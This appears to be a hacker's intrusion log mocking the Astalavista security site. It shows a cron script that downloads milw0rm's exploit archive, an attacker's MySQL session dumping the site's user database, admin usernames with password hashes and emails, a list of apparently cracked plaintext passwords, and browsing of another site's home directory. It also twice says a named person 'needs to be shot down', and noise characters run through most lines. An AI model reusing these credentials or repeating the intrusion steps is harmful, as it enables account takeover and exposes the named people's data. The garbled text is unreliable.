<link>http://www.astalavista.com/exploits</link>/ y* g/ S6 {8 D8 i7 _4 E
<description>All availably Exploits.</description>0 P6 N: \6 g- d1 N+ h4 F( \6 q0 B
<language>en-us</language>8 V# {, t" s9 ~2 y
<lastBuildDate>’ . date(’F, j M Y H:i:s O’) . ‘</lastBuildDate>+ l! t8 {7 w1 u* {% Z, s
<docs>http://blogs.law.harvard.edu/tech/rss</docs>
! x* o& U/ |5 x+ |4 {0 y <generator>Astalavista.com</generator>$ j6 @$ P" P" C: c" {2 {$ X6 Y
<webMaster>info@astalavista.com</webMaster>’ . $items . ‘
+ X3 R6 I, ^; Y b </channel>
# \$ i- D3 i ^; r% i/ Y6 w( V# _6 s</rss>’;
1 H1 h3 D5 P) U. H
- P; d5 J$ ]- ^ u- l if (file_exists(FULLPATH . ‘/feed/exploits.xml’)) {
* P2 S+ z5 o* n, I2 N- h5 q0 M; S unlink (FULLPATH . ‘/feed/exploits.xml’);
2 o1 o. E$ N% c! v+ b6 f }
' [6 P! e: |5 Z- e2 O2 D. Y
- @- p# O; E+ ^ file_put_contents(FULLPATH . ‘/feed/exploits.xml’, $xml);
2 B! h# Z" H9 ~% ^0 c[snip]0 ^& t5 v' Q2 z0 R. @ @8 p
/ a6 N$ g" G$ U" ?7 l$ L
sh-3.2$ cat exploits.sh
& ^* k |4 n4 L2 b$ E. S$ S#!/bin/sh7 u5 {' D( e5 V" P% G
& ~; Q' M$ o& n9 f2 b
###########################################################
! H% O: ]; Q1 J# #& o T& t9 a5 s0 R9 X3 Y: K/ E
# Title: milw0rm exploits adder #
& [, d8 @$ [. ^3 `% X& |$ z# Description: Add all milw0rm exploits to the #
0 B* @( j) A& x) B; ]5 r2 o# Astalavista.com database #; ^4 f! F0 }+ Z7 X8 j8 B
# #
! c. x: M" w: f8 g! \# Company: Astalavista Group #. X- M1 x% C9 F! B1 L) ?: Z
# Author: Paulo M. Santos #
$ m1 o- y# T' W# E-Mail: 链接标记paulo.santos@astalavista.ch #
0 z7 s) m7 ~9 e( \0 b# #
4 j9 l& L# B: b- K###########################################################" Q- s9 a4 L: d, M9 ]- c6 K
/ y+ }/ j7 t1 ^# path. }% ~! F, i1 K6 T
this_path=/home/com/public_html/modifications/cronjobs5 G* d8 K! V! R1 H+ P
; L7 \7 a$ U. q, [# change directory) ?0 G' Y$ } K; n' Q7 |( K& L' }
cd $this_path
, }* Y0 Z% O& F( J3 pcd tmp/8 \. ? u H8 f
; J" O) u9 S" m0 L0 l8 j
# delete files* U1 p# R% O* n. g8 d7 |: S/ A" z8 ^
rm -rf milw0rm.tar.* &
' @! a7 Y( _6 erm -rf milw0rm/ &7 u/ w3 h0 q7 l0 M
$ `! `8 s+ H! F* b. }: d& ~* P: D5 J
# wget milw0rm paket( h0 ~( B6 A$ h6 ~+ D. y8 v
wget 链接标记[url]http://www.milw0rm.com/sploits/milw0rm.tar.bz2[/url] I% ?( n- b- q* r
S# O b8 s- v, e9 x5 f# extract milw0rm paket
; D+ S+ h0 `; @8 [tar -xvf milw0rm.tar.bz2
7 Q: J5 }) X& N" I% T3 t# U5 N0 R
; D! b# ^" L& B- z4 ]# change owner
, ]2 _* r2 C. I: \: |chown -R com .' C( k% }# A5 k" n% S- Z+ A1 P
chgrp -R com .8 q1 m# O4 ~- m5 Z2 _6 b
3 h; S& q$ `. A
# execute php script
3 q; A% v/ {7 {7 h& H7 J* q: Fcd $this_path1 ~; ]' Z. L s. R3 A3 b9 r
php -q exploits.php8 t/ B+ G0 i- i& J9 `
& E& ] M; @8 H
# delete files
U8 Q4 C+ j7 S# N! F& qrm -rf tmp/milw0rm.tar.*6 @) k% n' i- K+ S
rm -rf tmp/milw0rm/6 h( i6 g+ I7 v
0 m9 w, ~9 Z. k0 \2 P9 y
sh-3.2$ echo “Paulo M. Santos needs to be shot down.”5 S; X6 p3 E8 T- ?0 v( g
Paulo M. Santos needs to be shot down.* S" e. ]7 {# q, z' U7 \
1 l# |1 C" |+ S- K* Xmysql -u contrexxuser2 -p
$ ]& A( Z( ]/ t" Y: l) UEnter password:; I) u% A' ], r- m" D
Welcome to the MySQL monitor. Commands end with ; or \g.
" L f2 C) B4 W. U( ?2 m2 jYour MySQL connection id is 261694 @! k) q' O, Y- H
Server version: 5.0.45-community-log MySQL Community Edition (GPL)
6 D2 V7 u8 |! d1 U) ?/ O
: b- F# Y2 v- h2 jType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.! u% z. G2 G' l5 s
. [# K4 C; T$ o. lmysql> show databases;0 J- o/ a- E) Y5 F3 x$ N
+——————–+ C8 e: O+ x8 |: O6 e( h9 z) P
| Database |" h6 @9 {' K$ T
+——————–+
' {1 U9 E3 q( S* {6 m| information_schema |
4 M0 a6 ^* N5 _4 A1 A! \ c( `| com_contrexx2 |1 v6 M/ F2 X% _3 P7 Z
| com_contrexx2_live |
. E) [% F/ z/ W| test |* ^$ g+ y. S7 }, O) ~7 a' U, y
+——————–+1 L! C4 F( a/ {2 w
4 rows in set (0.00 sec)
4 ^( s4 H, e V% r( g- N
8 ^$ ~( r6 Z T, L6 Z1 Mmysql> use com_contrexx2_live' Q% }; p6 F; M( w- Z: o9 _9 q; |$ L
Database changed# ^7 t x# h# Z5 \2 o0 z
mysql> show tables;
' u5 p+ m0 O6 G1 g' o, C$ ]+————————————————–+
7 |8 o* E6 L7 O, N G- c| Tables_in_com_contrexx2_live |
I+ ?, N+ j" }( b$ q+————————————————–+8 l% {" K; \% o/ ~, m- _
| cc_banner_counter |
/ p. Q( ]4 S3 a0 E2 ?| cc_search_counter |
2 y: c5 b5 {) F2 Z& n| contrexx_access_group_dynamic_ids |
0 e3 m0 g0 V, k+ u| contrexx_access_group_static_ids |
: @3 k: _8 J) k9 R1 Z2 J0 K9 G; e, m| contrexx_access_rel_user_group |
& C$ l; K! ~$ t" b2 A* w8 g| contrexx_access_settings |' Q; ^$ S) Z% J+ b- ~/ E: f, l
| contrexx_access_user_attribute |
2 ] Y$ f$ b9 y4 b2 r% D| contrexx_access_user_attribute_name |
% g0 m$ _; o! r/ c" q" C1 t| contrexx_access_user_attribute_value |. C0 j( h ]! w$ c
| contrexx_access_user_core_attribute |
2 F( {( z, q6 U1 r4 C| contrexx_access_user_groups |! ]0 S% H- x$ ?
| contrexx_access_user_mail |
% Z' ~) F4 F8 @+ J! S' w! Y| contrexx_access_user_profile |8 J+ x* u8 w" d( h1 v/ B
| contrexx_access_user_title |+ n: o9 R% x2 C, @3 X" ?
| contrexx_access_user_validity |
! {9 t$ r4 }0 K: }* p9 u" W| contrexx_access_users |, Q' ?/ R& M0 i7 e/ |
| contrexx_backend_areas |
1 c0 l" N/ {& W: D6 c" p2 n| contrexx_backups |
' q) p, F0 ?% g) B% c5 n: E" B| contrexx_content |: W. u" W8 C$ T7 p/ L. b& j/ n
| contrexx_content_history |3 N$ g s; i8 ^) |! G) V
| contrexx_content_logfile |
# e/ m0 Z q" K3 N, b7 f| contrexx_content_navigation |& Z/ `' v% g H; w) _; Q. ~
| contrexx_content_navigation_history |' h. N* u' L8 W
| contrexx_ids |
* ?, @( a0 G; o5 x| contrexx_languages |
! g" x1 g5 Z$ v5 v" e* S; q" o| contrexx_lib_country |
% H$ S9 [( }! D7 R1 I f1 _| contrexx_log |# ~/ Y" l: h7 F* X! y
| contrexx_module_alias_source |
# @! }/ U! V' c# E1 {5 K( v2 b| contrexx_module_alias_target |7 k7 d5 D7 R/ O1 d, G8 n
| contrexx_module_block_blocks |' p5 D+ j1 k& o; f
| contrexx_module_block_rel_lang |
4 j* C6 ^% L1 e2 ^/ ^| contrexx_module_block_rel_pages |
- c } K/ s- v5 }| contrexx_module_block_settings |5 g; k" {3 o% b+ s/ F% n
| contrexx_module_blog_categories |
9 K; A- L ?& G5 S| contrexx_module_blog_comments |
9 q- {( s3 k z3 H) W" X/ t5 K| contrexx_module_blog_message_to_category |
" F! X4 f7 {* z| contrexx_module_blog_messages |; U7 W% ^# ~! Y5 T$ N7 Y: m
| contrexx_module_blog_messages_lang |9 U! c" E) z6 T9 t
| contrexx_module_blog_networks |) {1 |; f3 l) |! O: u6 _+ m0 z
| contrexx_module_blog_networks_lang |
! S) G* G' L# l( ]1 `| contrexx_module_blog_settings |
8 g* c, m8 u* l1 k| contrexx_module_blog_votes |
0 |0 q7 `5 N' j| contrexx_module_calendar |
8 [( U: f" X5 v7 v0 F1 }# ^| contrexx_module_calendar_access |( V* g5 e0 v2 }9 e3 |7 y& \1 M
| contrexx_module_calendar_categories |
2 k+ [9 `; u2 m- c5 o2 m| contrexx_module_calendar_form_data |/ n" G: X- ^+ K, c3 \+ J
| contrexx_module_calendar_form_fields |
# `+ m: \* O- k0 J! _9 E| contrexx_module_calendar_registrations |
- ?; c" K1 Z' q' h$ T| contrexx_module_calendar_settings |: Z9 c) X# l9 f: L4 b0 o
| contrexx_module_calendar_style |
" o5 G, e6 b M, Q3 ]6 \6 F| contrexx_module_contact_form |
C. h& g3 \! O! ^3 } || contrexx_module_contact_form_data | ~0 g) `$ B' m
| contrexx_module_contact_form_field |" J9 e. w' _7 H: m% N P, \
| contrexx_module_contact_settings |, W5 K/ n8 {4 A" I
| contrexx_module_data_categories |9 _: Y+ g0 }" h3 l* C0 y7 q
| contrexx_module_data_message_to_category |
& |5 ?7 L6 Q1 }" i- k+ |& s| contrexx_module_data_messages |
, r0 p1 r" L. R) N* c' b6 H: j3 n7 M| contrexx_module_data_messages_lang |
( Q- ]2 x& q# M1 r( _; w1 }| contrexx_module_data_placeholders |
4 J6 V( c# ~* b4 R/ t: y| contrexx_module_data_settings |7 h0 j+ Y# ?# P" V0 K3 M
| contrexx_module_directory_access |% E' a5 F9 D P
| contrexx_module_directory_categories |) g+ s( W% ?7 I2 O6 \- l7 m
| contrexx_module_directory_dir |4 R+ B+ U, G3 [7 ]8 R
| contrexx_module_directory_inputfields |1 w; ~. }$ y9 _3 a5 _+ F" ^0 {
| contrexx_module_directory_levels |
& \) L, ]& q, q| contrexx_module_directory_mail |
; l- B7 K; m Y7 V4 V3 X- p| contrexx_module_directory_rel_dir_cat |. L- P7 V+ B$ ], e4 E: A* G5 O
| contrexx_module_directory_rel_dir_level |5 g: d# t* f; N6 _
| contrexx_module_directory_settings |8 S: }4 A& b; H3 ^
| contrexx_module_directory_settings_google |
4 f5 D8 h0 d1 d| contrexx_module_directory_vote |
- K0 P! V& z# m| contrexx_module_docsys |( [; k* i Y8 n( f! v
| contrexx_module_docsys_categories |2 Z R, b/ H4 T4 d+ O% |% z- s' w
| contrexx_module_egov_configuration |4 F4 u/ b: S! k* `
| contrexx_module_egov_orders |, Q; L/ F1 m) e: A; z A6 V7 S# d
| contrexx_module_egov_product_calendar |
1 D0 Y; _* ?5 j' v% h) K| contrexx_module_egov_product_fields |2 s' s7 g5 S b1 y
| contrexx_module_egov_products |
- K0 }- R5 Q' ?; W| contrexx_module_egov_settings |
* i8 T* a: p% @- G| contrexx_module_exploits |5 F$ n* K/ L8 F- a& d& b" {
| contrexx_module_exploits_categories |
, U8 S9 L& g: w1 V: ^& Y| contrexx_module_feed_category |
, e* o$ q7 n4 ^8 V% ~ x8 w0 X5 T| contrexx_module_feed_news |
1 w# p5 q5 q9 X| contrexx_module_feed_newsml_association |
+ j1 @7 ^; |5 J! T j* q+ Y| contrexx_module_feed_newsml_categories |* V/ M E& B' Y! H
| contrexx_module_feed_newsml_documents |5 A0 I" n/ [8 P1 g7 a
| contrexx_module_feed_newsml_providers |
6 a) t- c* S% t. ~2 F| contrexx_module_forum_access |
( ~& Q( I" z2 K" q$ M3 o| contrexx_module_forum_categories |
' f3 I6 ?# l4 b2 ]| contrexx_module_forum_categories_lang |% Y6 F* `0 O9 A
| contrexx_module_forum_notification |8 P2 i ^& ?6 w9 [! }; a5 }
| contrexx_module_forum_postings |, {$ T g/ U/ P/ B( n) L
| contrexx_module_forum_rating |
2 [6 ?3 E" ?( ~3 [| contrexx_module_forum_settings |
2 p' f3 Y" w6 V0 o| contrexx_module_forum_statistics |+ P4 x" U& K4 V* d
| contrexx_module_gallery_categories |
) {' ~& O- Z& S/ C4 d7 Q7 a| contrexx_module_gallery_comments |* f" f( G- H+ ^. O- w
| contrexx_module_gallery_language |8 f- [ @; h+ r6 e+ F
| contrexx_module_gallery_language_pics |
" `! `& ^. W/ C) Z& m| contrexx_module_gallery_pictures |
3 e8 z! z4 [$ Z7 ^3 D6 ]9 N| contrexx_module_gallery_settings |
/ u, E9 H5 D9 X6 P. N+ C5 X- I7 [5 U| contrexx_module_gallery_votes |9 ?; g$ I1 u) |8 A
| contrexx_module_guestbook |
% n& i4 }2 g/ N: N: J| contrexx_module_guestbook_settings |0 i8 s$ s+ X: g& @
| contrexx_module_livecam |
! y" {* M4 k- H- y! y- I& d| contrexx_module_livecam_settings |
6 V$ Z9 {% U% l! v| contrexx_module_market |
# v& e& [7 P, q+ E5 t| contrexx_module_market_access |
/ L9 v1 T* I; T( p| contrexx_module_market_categories |" _5 h/ _# e* Y
| contrexx_module_market_mail |
* F8 ~. b. s7 P8 j. V7 h| contrexx_module_market_paypal |
2 C% M$ u( I. R) o- @| contrexx_module_market_settings |
6 _- Q1 X) m, Y| contrexx_module_market_spez_fields |
7 G" z; R4 S' q& |) f3 o| contrexx_module_mediadir_access |
" X6 h3 S" x+ l5 ` d8 C0 K0 \2 k+ T| contrexx_module_mediadir_categories |
3 a! G' q3 A0 o6 J. X d1 H| contrexx_module_mediadir_comments |+ y9 U$ k% q, b; H2 _# X) F
| contrexx_module_mediadir_dir |
; V/ a2 h1 T9 S. C! B| contrexx_module_mediadir_inputfields |
& B3 i. Q+ n" O0 l$ [" T% Q| contrexx_module_mediadir_levels |+ ? G' O5 l$ C& f- {8 B7 j
| contrexx_module_mediadir_mail |
; h8 ?( x) c5 g, q i| contrexx_module_mediadir_rel_dir_cat |
1 g, m' n' w2 N6 t3 i| contrexx_module_mediadir_rel_dir_level |% }' x0 m; P \9 Y& X
| contrexx_module_mediadir_reports |+ d4 ~, W$ |, e; C4 D
| contrexx_module_mediadir_settings |
4 }$ k. F( h, J) ~| contrexx_module_mediadir_settings_google |# o/ a3 O. M: K
| contrexx_module_mediadir_vote |/ {7 Y' E* }- S
| contrexx_module_memberdir_directories |+ K5 N. w s' S9 j$ w
| contrexx_module_memberdir_name |$ B4 G) u5 o1 v5 `$ o
| contrexx_module_memberdir_settings |2 F7 g9 Y8 e2 z
| contrexx_module_memberdir_values |6 i) l8 `3 X# d+ b% A
| contrexx_module_nettools_allowed_groups |: r& r& ], w- b6 }0 y( Z3 l R4 d! [
| contrexx_module_nettools_settings |
$ q2 J6 a- N0 ^+ s5 Y- o4 m4 k| contrexx_module_news |. L e0 R( }9 W6 ?, }; o# U
| contrexx_module_news_access |
7 F2 x8 F3 m' [4 h| contrexx_module_news_categories |9 R5 D- G7 {8 V @% W' _
| contrexx_module_news_settings |
9 Z4 B: k. \& N1 r| contrexx_module_news_teaser_frame |0 |( Z: [6 n; K3 i
| contrexx_module_news_teaser_frame_templates |# S" D6 f/ d) S$ p0 W C" z/ h
| contrexx_module_news_ticker |
$ V8 y$ B# A9 ^. j| contrexx_module_newsletter |
/ i8 g* n, j" L+ |, x. E1 a% q| contrexx_module_newsletter_attachment |
) ?3 c- X K7 n8 C' {| contrexx_module_newsletter_category |
# {1 ^$ X7 ^+ t| contrexx_module_newsletter_confirm_mail |
9 \0 T) q5 V; ?/ r) m9 M( d| contrexx_module_newsletter_rel_cat_news |
2 @8 E- h4 @& U. m4 d; A' c| contrexx_module_newsletter_rel_user_cat |$ I1 r2 \9 P8 ]( x& C( F
| contrexx_module_newsletter_settings |
& u1 ?6 `2 G' R2 H0 b. W| contrexx_module_newsletter_template |* d+ R; \. e' l( L
| contrexx_module_newsletter_tmp_sending |# Z& d( y1 V" d7 w, j& U& ~. h) b
| contrexx_module_newsletter_user |% T0 r1 C) t: w3 K; \& b7 Q
| contrexx_module_newsletter_user_title |
# j% H" A, C+ j" o* b* k2 U| contrexx_module_onlinetools_defaultports |7 R& \4 I# B9 ^5 L2 h( L
| contrexx_module_onlinetools_defaultports_back |) [1 m. Y h3 W+ v
| contrexx_module_onlinetools_geolitecity_blocks |2 ]7 E$ y% _3 b5 |5 k1 u. w$ J/ v
| contrexx_module_onlinetools_geolitecity_country |& K+ Z3 W8 q1 B% s
| contrexx_module_onlinetools_geolitecity_location |
- K, [) @# t. [7 b( b. Q| contrexx_module_podcast_category |/ R; T3 b1 g; y3 O4 M$ l; Y
| contrexx_module_podcast_medium |
0 I- L" z) m$ u3 j6 o| contrexx_module_podcast_rel_category_lang |
( U a. w" {3 Q1 v| contrexx_module_podcast_rel_medium_category |: t8 `$ M3 S3 J5 P/ X$ a+ @
| contrexx_module_podcast_settings |
5 L* h8 [8 a+ j$ t( || contrexx_module_podcast_template |
/ x) t8 W* Z$ o2 z0 h' ~, V; _9 a| contrexx_module_proxydb |
$ x) N/ a7 Z* |' b| contrexx_module_recommend |+ N) G& a* m5 f% h5 \$ j4 ^; ?
| contrexx_module_repository |
4 t4 B. }* I, m0 C! \) d- \% i+ w| contrexx_module_securitynews_cats |; x0 m; ^6 a) ^0 Z8 D. b1 u
| contrexx_module_securitynews_feeds |
! H M# w Z2 E8 J- R% i, k| contrexx_module_securitynews_news |$ U- I4 ^' G1 Z) i
| contrexx_module_shop_categories |
/ j7 C+ M; F% o5 I: p| contrexx_module_shop_config |4 A( S# O: t! x/ @" S
| contrexx_module_shop_countries |
( L9 S- s( j K# U" `* n6 v/ ~" `| contrexx_module_shop_currencies |2 e, L7 b) D7 u* U" Z' m" B6 k) e
| contrexx_module_shop_customers |
5 v$ d: w C4 C; P| contrexx_module_shop_importimg |; x+ `; @; Q9 M$ x& h
| contrexx_module_shop_lsv |( a, v' d P* R: a
| contrexx_module_shop_mail |7 v% i6 p9 ^8 X* B: X% q. d- r
| contrexx_module_shop_mail_content | T1 ^" ~# T3 j! N6 m9 I Z
| contrexx_module_shop_manufacturer |8 `5 S0 t4 `8 p8 @ U
| contrexx_module_shop_order_items |9 G4 @. a( U. h, M: |: \( s
| contrexx_module_shop_order_items_attributes |
+ w4 ~8 u1 X) c- y! u) {| contrexx_module_shop_orders |; k& ^. \9 a0 |; g0 Z3 A @& d" f
| contrexx_module_shop_payment |1 P7 g, E" g# o# e
| contrexx_module_shop_payment_processors |
; ~, y1 ]. g" Z3 {8 |+ R| contrexx_module_shop_pricelists |2 f1 @. G+ J" Z. k
| contrexx_module_shop_products |
: M4 F/ v, u# z| contrexx_module_shop_products_attributes |
6 _: p7 U4 e5 D$ P8 c, [| contrexx_module_shop_products_attributes_name |
" O' u3 x# _8 R, J! d| contrexx_module_shop_products_attributes_value |. y i2 z/ w H* ?( A" _9 E
| contrexx_module_shop_products_downloads |; `7 ?4 g# L: [5 j y9 J
| contrexx_module_shop_rel_countries |6 U( u4 x' i- k* X3 K. O
| contrexx_module_shop_rel_payment |9 `! K3 j) G+ T' |0 u: Q; p7 e
| contrexx_module_shop_rel_shipment |
8 x9 ~+ k& c; L2 J u| contrexx_module_shop_shipment_cost |. U' v/ q- ?- }. X. ] i4 H$ W1 K
| contrexx_module_shop_shipper |
/ q. w% W" |& a$ o. s( S& d; g& q| contrexx_module_shop_vat |
! ^! B3 s# }$ m2 d' b; N' y| contrexx_module_shop_zones |% l- x& _; j( A) U+ x
| contrexx_module_u2u_address_list |
3 b I" I% }9 t* a$ }| contrexx_module_u2u_message_log |+ k: J4 k/ y" d2 j
| contrexx_module_u2u_sent_messages |# d% M2 t" { W0 t5 c w( W
| contrexx_module_u2u_settings |
2 G" J0 l( k3 B) r2 ^0 P| contrexx_module_u2u_user_log |
3 `% U- U# p; D4 |- O; Z* ?: h| contrexx_modules |0 J: l; ^7 Z; _: B% D- @0 A. O) D
| contrexx_sessions |8 n( Y& g8 i2 P, k8 b- J7 A
| contrexx_settings |( o: s8 e+ ^4 j i+ y
| contrexx_settings_smtp |. v+ i7 q* H) T% F' Z
| contrexx_skins |- O' i. d4 [, p4 z d+ O
| contrexx_stats_browser |
! h9 S" Z; ~' k& S+ b+ c! A0 j# B| contrexx_stats_colourdepth |
1 d" @0 j b% i- p( J2 c W n! P% S| contrexx_stats_config |8 o% f, ]; \) J/ W% I. C' v* M/ a+ v
| contrexx_stats_country |
. Q2 y# K. I* A+ `& m( _3 r" U| contrexx_stats_hostname |* }7 }7 Y0 L! p5 Q6 W
| contrexx_stats_javascript |
: ~4 s3 J% x# ?/ [) @/ \| contrexx_stats_operatingsystem |
: R! [8 c7 L: |1 J6 F2 k0 s| contrexx_stats_referer |8 V- x5 L2 c2 y1 D9 M
| contrexx_stats_requests |: ?. c$ q d6 Q2 w$ f6 V8 k
| contrexx_stats_requests_summary |
+ q( W% p; z% T2 B9 Z) b| contrexx_stats_screenresolution |
0 z; |* [) W& G0 U| contrexx_stats_search |7 \" T- F; b* h0 B
| contrexx_stats_spiders |2 n4 l" }3 ]0 J6 T Q& w
| contrexx_stats_spiders_summary |" c* m& ^* S x" w% X
| contrexx_stats_visitors |8 ~+ K7 T r# I3 e
| contrexx_stats_visitors_summary |; Y4 O; W! K" i5 L+ F2 x
| contrexx_voting_additionaldata |8 y2 B& U% P8 D! }, y9 R
| contrexx_voting_email |
; f0 R4 D* D9 X& g) F/ z3 S2 K9 w| contrexx_voting_rel_email_system |: b- l2 Y' V( R0 f& i
| contrexx_voting_results |" Q, N3 s+ C3 S1 H7 [
| contrexx_voting_system |. K% h- I' H2 C+ m- y( f
| foo |+ ^: Y5 |4 c+ K
+————————————————–+3 \) T5 [2 b+ w! n- d/ j3 X
227 rows in set (0.01 sec)
& t; D1 V; r& Q: T4 V3 A/ E- d2 v: f
mysql> select count(*) as skids from contrexx_access_users;
- A$ b7 [+ N0 d9 H0 F+——-+7 s. Q, ^7 I1 \
| skids |
% f4 u6 ], W/ j/ e6 y2 R+——-+' R- O U, ~3 q* H" E6 I7 ?
| 53699 |
; x, }& d$ e8 }& I: m+——-+
8 n3 G( b7 p& @; R1 row in set (0.00 sec)
% _$ U1 h& _ A# c5 c
$ S J4 q" v; Fmysql> describe contrexx_access_users;4 \% H; l; z: {/ Z
+——————+——————————————+——+—–+————–+—————-+5 d/ {- _8 d2 `- p* Y
| Field | Type | Null | Key | Default | Extra |
" _8 Q- _6 Y" ~/ M( {$ |' e7 n5 ~7 Y+——————+——————————————+——+—–+————–+—————-+
- ?% |" b! U3 f& I! G6 s| id | int(10) unsigned | NO | PRI | NULL | auto_increment |: [( ~/ W. }! O, t% X) j+ ]5 t
| is_admin | tinyint(1) unsigned | NO | | 0 | |
: T% h9 @4 C; v* C| username | varchar(40) | YES | MUL | NULL | |
- _' r& w6 c k3 b# u+ h* G2 F5 D| password | varchar(32) | YES | | NULL | |% y W C- G3 v% J6 [
| regdate | int(14) unsigned | NO | | 0 | |
$ O! v' l! T2 S- E+ L! p4 d| expiration | int(14) unsigned | NO | | 0 | |# a6 }$ g L4 j
| validity | int(10) unsigned | NO | | 0 | |
( m5 b" X/ k) w7 w Y| last_auth | int(14) unsigned | NO | | 0 | |
4 O$ ~ u& M0 z9 G1 m' E| last_activity | int(14) unsigned | NO | | 0 | |! _$ i1 Y/ J9 `: A; t9 X0 _9 M \' A G
| email | varchar(255) | YES | | NULL | |$ {! f8 s3 R& l3 y
| email_access | enum(’everyone’,'members_only’,'nobody’) | NO | | nobody | |! C; @0 X4 P1 ~- Y7 |' N' J) U
| frontend_lang_id | int(2) unsigned | NO | | 0 | |
% I0 O5 M/ C6 R8 r& s| backend_lang_id | int(2) unsigned | NO | | 0 | |1 ^+ W. i8 E5 Y3 ]2 @
| active | tinyint(1) | NO | | 0 | |
; W/ b5 Y2 K3 u3 @2 V| profile_access | enum(’everyone’,'members_only’,'nobody’) | NO | | members_only | |3 |5 h+ i" b$ r; A
| restore_key | varchar(32) | NO | | | |
2 V; x# u9 }& ]/ G0 || restore_key_time | int(14) unsigned | NO | | 0 | |1 h& A+ h/ \ y) y8 M, e8 k
| u2u_active | enum(’0′,’1′) | NO | | 1 | |
* t6 _( Z% l6 M+——————+——————————————+——+—–+————–+—————-+
# N n7 r' r1 k( }( ?0 M2 O0 o18 rows in set (0.00 sec)
% \& L% j B) G5 T
4 M! s" w* K# |# Q5 y4 L4 zmysql> select username,password,email from contrexx_access_users where is_admin = 1;4 w+ c" \1 \% C/ t( m
+————+———————————-+—————————–+
- |: X# G6 s: R6 h| username | password | email |+ r* Z3 J5 m, ]6 U/ d" W' ?
+————+———————————-+—————————–+
+ m: W4 r& k+ S7 m2 E, J! c| system | 0defe9e458e745625fffbc215d7801c5 | 链接标记info@comvation.com |
9 C0 n2 e0 v1 k8 h: B| prozac | 1f65f06d9758599e9ad27cf9707f92b5 | 链接标记prozac@astalavista.com |
4 Y0 L4 ~ o B2 h| Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a | 链接标记paulo.santos@astalavista.ch |
; e& k0 z. q( T: m4 V q5 l| schmid | 0defe9e458e745625fffbc215d7801c5 | 链接标记ivan.schmid@comvation.com |* _" m5 P, O* B6 H* {2 m( `! N( L
+————+———————————-+—————————–+
( s1 Q7 D7 D' H4 rows in set (0.04 sec)" ^9 G" E9 w8 k* g! N
% L! X- f# ^) c# h I3 C' K
mysql> exit;
$ M7 Z; F1 k1 R7 Z3 S$ ~Bye
l4 q+ Q. }8 W- W) A8 Y! D) v! g* u
[~] There you go, your “team of security and IT professionals” is a joke.
) C; G% Z( r/ o) R$ t1 x' D
4 c- Y" r3 f `. l# A! N$ N; L7 k+——————————+
4 J5 Z, v, ^1 H5 ^2 A' c/ Ssystem:f82BN3+_*2 Z4 |! ~: T0 S# W5 Z) N
Be1er0ph0r:belerophor4astacom
( z# j/ C- b2 Q: h. Wprozac:asta4cms!
# ?% q( {/ p' x, Scommander:mpbdaagf6m' Q/ R; }; O, z* b* q
sykadul:ak29eral% \# c; b. U4 q9 _7 Z
+——————————+
! o% ]3 o% B- g, e7 W+ ~3 M7 y9 F3 N1 A" E
[~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his milw0rm ripping script(s)3 m J/ h7 K" q4 r
…and the others, find another area to get paid from, security isn’t for sale and you obviously fail at it.! W0 X7 J7 K+ u) y4 Z4 Q4 _! s0 u
7 L" G; t |0 o* O" u[~] Lets move to astalavista.net now,( W9 \, O0 v D
5 Z8 u* M, F0 p7 ~/ l) K
From <链接标记[url]https://www.astalavista.net/[/url]>:
6 U m. ^4 J3 u; l6 Q* F>> Everyone knows that the best defense is a good offense.4 a2 |9 ~) v1 }& k8 u0 {4 m0 K9 Y
>> Those who wait for their foes to find a security loophole are opting for the wrong strategy.- B' T, ]3 Q% d
>> The ASTALAVISTA hacking & security community is the largest IT security community in the world.* c7 K3 b4 R7 f# J. n7 p- y
>> It.s a platform for both IT specialists and novices, and anyone interested in expanding and updating their knowledge regarding IT security and hacking.”+ W) u5 j' \3 z# Y8 }9 @5 E3 j
( u/ Z4 @' t2 d! d4 q0 P4 G9 l>> Go ahead, try and hack our server . in a completely legal way!
' u$ u- _& Z6 w5 V>> Learn by doing: We offer our members tricky tasks and challenges on an: }) k5 a5 X3 ~' E5 j
>> ongoing basis so you can test your knowledge and abilities. You can also
4 \1 Q3 U# c; ]+ h- ^* Y>> demonstrate what you.ve mastered by taking part in regular hacker contests; \+ ]2 \$ t- [0 }% F( M6 n
>> and war games" @4 y+ n9 U) I8 [5 }- t
2 y( E$ ?; P* i* K, N7 Q
[~] Lets take a look there, after all… they are hack-proof, aren’t they?!
2 C" a/ q* v4 \4 D" |/ S% S) ?' W: u5 c% s- }5 I+ l/ n* m) h4 f
[-] Tricky task: Find home dir of astalavista.net- h! A' Z q7 ?' S
. c; V6 k. V$ J# psh-3.2$ ls -la ~astanet
( d* ?9 O" i7 R P6 B! j7 Q$ stotal 48
+ W, u5 N- ~+ f6 S; Adrwx–x–x 6 astanet astanet 4096 Dec 23 15:55 .# G) ~6 {6 M! k2 ^2 q
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
" q) A6 {& {$ @8 h* b. l: W3 ?drwxr-xr-x 2 root root 4096 Dec 23 16:00 auth
' a2 {, c1 X8 ^7 b3 f/ m& Z-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history8 W( ?6 X" H/ w. c. r/ y
-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout
: _9 R, Z, v( h" B6 ~-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile- p: l: Y1 |- v3 y6 S) W% i5 _: `
-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc1 s) g9 ^% A0 n
drwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains6 L1 W- R l2 f% P' N: k
drwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap
% l% L7 _; a% p( n2 n5 tdrwx—— 2 astanet astanet 4096 Dec 23 12:18 mail5 q) o: Q7 y K8 T9 h# }
lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
" W9 E0 O6 n2 b) w; Z" X; h-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow
3 L. `. g2 ~3 f: J/ ^, w# [6 b7 u7 @4 [% H2 s7 G
sh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/
* l. v# x8 b! f, w! fsh-3.2$ ls -la7 Q5 m, d/ y3 _0 ^" I9 q
total 200# w& v5 D2 m/ _' Z; J$ L
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 .
) N- M* ]8 }( Q% o( T+ i' F# @drwx–x–x 8 astanet astanet 4096 Dec 23 13:53 ..
